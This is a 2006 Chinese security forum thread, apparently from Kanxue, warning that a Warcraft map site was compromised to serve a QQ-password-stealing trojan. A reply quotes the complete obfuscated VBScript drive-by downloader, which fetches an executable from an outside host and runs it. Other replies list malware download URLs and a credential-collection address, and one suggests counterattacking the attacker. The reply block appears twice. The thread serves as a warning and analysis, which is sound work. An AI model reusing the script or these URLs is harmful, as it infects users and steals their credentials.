[注意]uuu9的主页被人挂马了，玩魔兽的小心了-软件逆向-看雪-安全社区|安全招聘|kanxue.com

[注意]uuu9的主页被人挂马了，玩魔兽的小心了

发表于: 2006-11-9 09:07 7861

[注意]uuu9的主页被人挂马了，玩魔兽的小心了

q3 watcher 活跃值

2006-11-9 09:07

7861

被挂马的网址：http://war3.uuu9.com/ 和......这个网站是比较著名的魔兽地图，许多地方都有镜相连接，比如：http://games.sina.com.cn/z/war3/2/rpgmap/index_uuu9.shtml
木马名称：moi.com
木马性质：盗QQ，释放到临时目录，UPX压缩，IE插件，带驱动，而且是比较新或是重编译的，主流杀毒软件中只有最新的K8可以杀，其他的都没啥反映（严重抗议国内的杀毒软件反映迟钝）。
危害：这个挂上去应该有一段时间了，估计好多人中标了，BS网站管理员不作为，拉出去打屁屁。

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课

收藏・0

免费・0

支持

最新回复 (22)
快雪时晴雪币： 370 活跃值： (15) 能力值： ( LV9，RANK：170 ) 在线值：发帖 34 回帖 2272 粉丝 1 关注私信	快雪时晴 4 2 楼怎么才能中木马？浏览网页就ok吗？我没中，郁闷利用了ie什么漏洞？ 2006-11-9 09:38 0
笨笨雄雪币： 846 活跃值： (221) 能力值： (RANK：570 ) 在线值：发帖 212 回帖 3620 粉丝 23 关注私信	笨笨雄 14 3 楼改出来的吧。。 2006-11-9 10:19 0
q3 watcher 雪币： 215 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 23 回帖 902 粉丝 0 关注私信	q3 watcher 4 楼打开就中标了,学艺不精，中了以后才发现。这个文件是病毒体，没做准备不要运行，我重启了一次才删干净。木马来自:http://www.wuswei.com/i/index.htm <script language="VBScript"> on error resume next Set dfile = document.createElement("ob"&QQ67112525ddd&"ject") dfile.setAttribute "cla"&Q52fg&"ssid", "clsid:B"&fgQ6725fg&"D96C556-"&fQ6ff&"65A3-11"&fg12525&"D0-983A-"&QQ67112525&"00C04F"&QQ67112525&"C29E36" Set http = dfile.CreateObject("Micro"&QQ67112525&"soft.X"&F4sdTRhh&"MLH"&"TTP","") a1="Ad" a2="odb." a3="Str" a4="eam" set strm = dfile.createobject(a1&QQ67112525&a2&F4sdTRhh&a3&a4,"") strm.type = 1 http.Open "GET", "http://www.wuswei.com/i/admin.exe", False http.Send f1="Scri" f2="pting.Fil" f3="eSyst" f4="emObject" str13=f1&f2&f3&f4 str12=str13 set fso = dfile.createobject(str12,"") set temp = fso.GetSpecialFolder(2) filename= fso.BuildPath(temp,"moi.com") strm.open strm.write http.responseBody strm.savetofile filename,2 strm.close b1="She" b2="ll." b3="Applic" b4="ation" set exc = dfile.createobject(b1&QQ67112525&b2&F4sdTRhh&b3&b4,"") str4="open" exc.ShellExecute filename,"","",str4,0 </script> 上传的附件： moi.rar （27.91kb，4次下载） 2006-11-9 11:06 0
goodcode 雪币： 67 活跃值： (66) 能力值： ( LV7，RANK：100 ) 在线值：发帖 19 回帖 289 粉丝 2 关注私信	goodcode 2 5 楼看不明白权限是怎么提升的... 2006-11-9 11:31 0
q3 watcher 雪币： 215 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 23 回帖 902 粉丝 0 关注私信	q3 watcher 6 楼已经有人在UUU9的论坛里反映了,现在主页已经清除木马连接,看来只要在看雪发一帖,地球人就都知道了. 2006-11-9 14:23 0
wfwf 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 48 粉丝 0 关注私信	wfwf 7 楼 2006-11-9 15:06 0
nbw 雪币： 339 活跃值： (1510) 能力值： ( LV13，RANK：970 ) 在线值：发帖 141 回帖 2842 粉丝 23 关注私信	nbw 24 8 楼偷魔?+QQ的??密瘁。办斤了： http://www.ads183.com/qq/meizi/ou.asp 另外又下了： http://www.meizi7472831.com/kanhai/229/1.exe http://www.meizi7472831.com/kanhai/229/2.exe http://www.meizi7472831.com/kanhai/229/3.exe http://www.meizi7472831.com/kanhai/229/4.exe http://www.meizi7472831.com/kanhai/229/5.exe http://www.meizi7472831.com/kanhai/229/6.exe http://www.meizi7472831.com/kanhai/229/7.exe http://www.meizi7472831.com/kanhai/229/8.exe http://www.meizi7472831.com/kanhai/229/9.exe lz把下面呃一堆也一次重起搞定了？ 2006-11-9 21:44 0
WAKU 雪币： 179 活跃值： (131) 能力值： ( LV12，RANK：290 ) 在线值：发帖 32 回帖 501 粉丝 0 关注私信	WAKU 7 9 楼 NBW再写一个病毒分析~ 2006-11-9 23:28 0
Pucua 雪币： 213 活跃值： (17) 能力值： ( LV2，RANK：10 ) 在线值：发帖 14 回帖 121 粉丝 0 关注私信	Pucua 10 楼最初由 nbw* 发布* 偷魔?+QQ的??密瘁。办斤了： http://www.ads183.com/qq/meizi/ou.asp 另外又下了： ........ 攻击它把,做个自己发送密码的,发送到他的数据库暴掉为止 2006-11-10 08:01 0
q3 watcher 雪币： 215 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 23 回帖 902 粉丝 0 关注私信	q3 watcher 11 楼最初由 nbw* 发布* 偷魔?+QQ的??密瘁。办斤了： http://www.ads183.com/qq/meizi/ou.asp 另外又下了： ........ 当我发现中毒以后立刻断网了,然后在少于10秒内杀掉了它的进程,这段时间内仅仅下了3个文件,还没来得及执行. 2006-11-10 08:08 0
Fuwa 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 41 粉丝 0 关注私信	Fuwa 12 楼驱网页挂马了： detected: Trojan program Trojan-Downloader.VBS.Small.av Script: http://bbs.driverdevelop.com/[1] 2006-11-10 08:50 0
yinxun 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 3 粉丝 0 关注私信	yinxun 13 楼 hao!!!!!!!!!!!!!!! 2006-11-10 08:55 0
nbw 雪币： 339 活跃值： (1510) 能力值： ( LV13，RANK：970 ) 在线值：发帖 141 回帖 2842 粉丝 23 关注私信	nbw 24 14 楼最初由 q3 watcher* 发布* 当我发现中毒以后立刻断网了,然后在少于10秒内杀掉了它的进程,这段时间内仅仅下了3个文件,还没来得及执行. 病毒?放的dll注入到所有咄程中，自身文件自?除了，?有咄程阿。看?施主中毒钊深啊。 2006-11-10 10:54 0
q3 watcher 雪币： 215 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 23 回帖 902 粉丝 0 关注私信	q3 watcher 15 楼 RUNDLL32,此时会使木马客星退出,但不幸的是注入被报警了,要不我咋知道的.之后我检查了所有新建文件,启动,服务,插件,驱动,才确认没问题的.我在学校的机器经常被中木马,我真是不理解,我的机器上又没啥好东西,QQ是垃圾号,游戏帐号里也没钱,未啥老是中毒哪?值得研究. 2006-11-10 11:08 0
nbw 雪币： 339 活跃值： (1510) 能力值： ( LV13，RANK：970 ) 在线值：发帖 141 回帖 2842 粉丝 23 关注私信	nbw 24 16 楼无耻啊无耻，我远程看了一下，你的确中毒了中毒了r 2006-11-10 18:23 0
wangshq397 雪币： 277 活跃值： (312) 能力值： ( LV9，RANK：330 ) 在线值：发帖 59 回帖 650 粉丝 0 关注私信	wangshq397 8 17 楼还是卡巴厉害，附件还没下载就查出来了。卡巴斯基反病毒6.0 The requested URL http://bbs.pediy.com/attachment.php?s=&attachmentid=3343 is infected with Trojan-PSW.Win32.QQPass.pz virus 2006-11-10 20:49 0
cxlrb 雪币： 238 活跃值： (12) 能力值： ( LV9，RANK：210 ) 在线值：发帖 192 回帖 923 粉丝 0 关注私信	cxlrb 5 18 楼原来是这个东西，之前在百度搜索东西，上一个国内网站就中招了，一大堆东西删除不干净，IE缓存和临时目录中都有，删了一边另一边又来了，最后只好ghost之前的windows 2006-11-10 21:01 0
baibai 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 295 粉丝 0 关注私信	baibai 19 楼 nbw确实厉害小弟我好身佩服 2006-11-10 21:39 0
backuper 雪币： 200 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 11 回帖 202 粉丝 0 关注私信	backuper 20 楼强... 2006-11-11 08:02 0
q3 watcher 雪币： 215 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 23 回帖 902 粉丝 0 关注私信	q3 watcher 21 楼最初由 nbw* 发布* 无耻啊无耻，我远程看了一下，你的确中毒了中毒了r 远程看了一下?怎么看见的?招,是不是你是指导挂的马. 2006-11-11 08:16 0
heimei 雪币： 82 活跃值： (531) 能力值： ( LV2，RANK：10 ) 在线值：发帖 26 回帖 278 粉丝 1 关注私信	heimei 22 楼为什么都中病毒呢？这些都是利用系统的漏洞来下载的！难道各位都不爱打系统补丁嘛　　　 2006-11-11 10:56 0
naitai 雪币： 206 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 21 回帖 110 粉丝 0 关注私信	naitai 23 楼那个老漏洞了06014据说效果很好 2006-11-11 18:16 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

q3 watcher

发帖

902

回帖

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (22)
快雪时晴雪币： 370 活跃值： (15) 能力值： ( LV9，RANK：170 ) 在线值：发帖 34 回帖 2272 粉丝 1 关注私信	快雪时晴 4 2 楼怎么才能中木马？浏览网页就ok吗？我没中，郁闷利用了ie什么漏洞？ 2006-11-9 09:38 0
笨笨雄雪币： 846 活跃值： (221) 能力值： (RANK：570 ) 在线值：发帖 212 回帖 3620 粉丝 23 关注私信	笨笨雄 14 3 楼改出来的吧。。 2006-11-9 10:19 0
q3 watcher 雪币： 215 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 23 回帖 902 粉丝 0 关注私信	q3 watcher 4 楼打开就中标了,学艺不精，中了以后才发现。这个文件是病毒体，没做准备不要运行，我重启了一次才删干净。木马来自:http://www.wuswei.com/i/index.htm <script language="VBScript"> on error resume next Set dfile = document.createElement("ob"&QQ67112525ddd&"ject") dfile.setAttribute "cla"&Q52fg&"ssid", "clsid:B"&fgQ6725fg&"D96C556-"&fQ6ff&"65A3-11"&fg12525&"D0-983A-"&QQ67112525&"00C04F"&QQ67112525&"C29E36" Set http = dfile.CreateObject("Micro"&QQ67112525&"soft.X"&F4sdTRhh&"MLH"&"TTP","") a1="Ad" a2="odb." a3="Str" a4="eam" set strm = dfile.createobject(a1&QQ67112525&a2&F4sdTRhh&a3&a4,"") strm.type = 1 http.Open "GET", "http://www.wuswei.com/i/admin.exe", False http.Send f1="Scri" f2="pting.Fil" f3="eSyst" f4="emObject" str13=f1&f2&f3&f4 str12=str13 set fso = dfile.createobject(str12,"") set temp = fso.GetSpecialFolder(2) filename= fso.BuildPath(temp,"moi.com") strm.open strm.write http.responseBody strm.savetofile filename,2 strm.close b1="She" b2="ll." b3="Applic" b4="ation" set exc = dfile.createobject(b1&QQ67112525&b2&F4sdTRhh&b3&b4,"") str4="open" exc.ShellExecute filename,"","",str4,0 </script> 上传的附件： moi.rar （27.91kb，4次下载） 2006-11-9 11:06 0
goodcode 雪币： 67 活跃值： (66) 能力值： ( LV7，RANK：100 ) 在线值：发帖 19 回帖 289 粉丝 2 关注私信	goodcode 2 5 楼看不明白权限是怎么提升的... 2006-11-9 11:31 0
q3 watcher 雪币： 215 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 23 回帖 902 粉丝 0 关注私信	q3 watcher 6 楼已经有人在UUU9的论坛里反映了,现在主页已经清除木马连接,看来只要在看雪发一帖,地球人就都知道了. 2006-11-9 14:23 0
wfwf 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 48 粉丝 0 关注私信	wfwf 7 楼 2006-11-9 15:06 0
nbw 雪币： 339 活跃值： (1510) 能力值： ( LV13，RANK：970 ) 在线值：发帖 141 回帖 2842 粉丝 23 关注私信	nbw 24 8 楼偷魔?+QQ的??密瘁。办斤了： http://www.ads183.com/qq/meizi/ou.asp 另外又下了： http://www.meizi7472831.com/kanhai/229/1.exe http://www.meizi7472831.com/kanhai/229/2.exe http://www.meizi7472831.com/kanhai/229/3.exe http://www.meizi7472831.com/kanhai/229/4.exe http://www.meizi7472831.com/kanhai/229/5.exe http://www.meizi7472831.com/kanhai/229/6.exe http://www.meizi7472831.com/kanhai/229/7.exe http://www.meizi7472831.com/kanhai/229/8.exe http://www.meizi7472831.com/kanhai/229/9.exe lz把下面呃一堆也一次重起搞定了？ 2006-11-9 21:44 0
WAKU 雪币： 179 活跃值： (131) 能力值： ( LV12，RANK：290 ) 在线值：发帖 32 回帖 501 粉丝 0 关注私信	WAKU 7 9 楼 NBW再写一个病毒分析~ 2006-11-9 23:28 0
Pucua 雪币： 213 活跃值： (17) 能力值： ( LV2，RANK：10 ) 在线值：发帖 14 回帖 121 粉丝 0 关注私信	Pucua 10 楼最初由 nbw* 发布* 偷魔?+QQ的??密瘁。办斤了： http://www.ads183.com/qq/meizi/ou.asp 另外又下了： ........ 攻击它把,做个自己发送密码的,发送到他的数据库暴掉为止 2006-11-10 08:01 0
q3 watcher 雪币： 215 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 23 回帖 902 粉丝 0 关注私信	q3 watcher 11 楼最初由 nbw* 发布* 偷魔?+QQ的??密瘁。办斤了： http://www.ads183.com/qq/meizi/ou.asp 另外又下了： ........ 当我发现中毒以后立刻断网了,然后在少于10秒内杀掉了它的进程,这段时间内仅仅下了3个文件,还没来得及执行. 2006-11-10 08:08 0
Fuwa 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 41 粉丝 0 关注私信	Fuwa 12 楼驱网页挂马了： detected: Trojan program Trojan-Downloader.VBS.Small.av Script: http://bbs.driverdevelop.com/[1] 2006-11-10 08:50 0
yinxun 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 3 粉丝 0 关注私信	yinxun 13 楼 hao!!!!!!!!!!!!!!! 2006-11-10 08:55 0
nbw 雪币： 339 活跃值： (1510) 能力值： ( LV13，RANK：970 ) 在线值：发帖 141 回帖 2842 粉丝 23 关注私信	nbw 24 14 楼最初由 q3 watcher* 发布* 当我发现中毒以后立刻断网了,然后在少于10秒内杀掉了它的进程,这段时间内仅仅下了3个文件,还没来得及执行. 病毒?放的dll注入到所有咄程中，自身文件自?除了，?有咄程阿。看?施主中毒钊深啊。 2006-11-10 10:54 0
q3 watcher 雪币： 215 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 23 回帖 902 粉丝 0 关注私信	q3 watcher 15 楼 RUNDLL32,此时会使木马客星退出,但不幸的是注入被报警了,要不我咋知道的.之后我检查了所有新建文件,启动,服务,插件,驱动,才确认没问题的.我在学校的机器经常被中木马,我真是不理解,我的机器上又没啥好东西,QQ是垃圾号,游戏帐号里也没钱,未啥老是中毒哪?值得研究. 2006-11-10 11:08 0
nbw 雪币： 339 活跃值： (1510) 能力值： ( LV13，RANK：970 ) 在线值：发帖 141 回帖 2842 粉丝 23 关注私信	nbw 24 16 楼无耻啊无耻，我远程看了一下，你的确中毒了中毒了r 2006-11-10 18:23 0
wangshq397 雪币： 277 活跃值： (312) 能力值： ( LV9，RANK：330 ) 在线值：发帖 59 回帖 650 粉丝 0 关注私信	wangshq397 8 17 楼还是卡巴厉害，附件还没下载就查出来了。卡巴斯基反病毒6.0 The requested URL http://bbs.pediy.com/attachment.php?s=&attachmentid=3343 is infected with Trojan-PSW.Win32.QQPass.pz virus 2006-11-10 20:49 0
cxlrb 雪币： 238 活跃值： (12) 能力值： ( LV9，RANK：210 ) 在线值：发帖 192 回帖 923 粉丝 0 关注私信	cxlrb 5 18 楼原来是这个东西，之前在百度搜索东西，上一个国内网站就中招了，一大堆东西删除不干净，IE缓存和临时目录中都有，删了一边另一边又来了，最后只好ghost之前的windows 2006-11-10 21:01 0
baibai 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 295 粉丝 0 关注私信	baibai 19 楼 nbw确实厉害小弟我好身佩服 2006-11-10 21:39 0
backuper 雪币： 200 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 11 回帖 202 粉丝 0 关注私信	backuper 20 楼强... 2006-11-11 08:02 0
q3 watcher 雪币： 215 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 23 回帖 902 粉丝 0 关注私信	q3 watcher 21 楼最初由 nbw* 发布* 无耻啊无耻，我远程看了一下，你的确中毒了中毒了r 远程看了一下?怎么看见的?招,是不是你是指导挂的马. 2006-11-11 08:16 0
heimei 雪币： 82 活跃值： (531) 能力值： ( LV2，RANK：10 ) 在线值：发帖 26 回帖 278 粉丝 1 关注私信	heimei 22 楼为什么都中病毒呢？这些都是利用系统的漏洞来下载的！难道各位都不爱打系统补丁嘛　　　 2006-11-11 10:56 0
naitai 雪币： 206 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 21 回帖 110 粉丝 0 关注私信	naitai 23 楼那个老漏洞了06014据说效果很好 2006-11-11 18:16 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复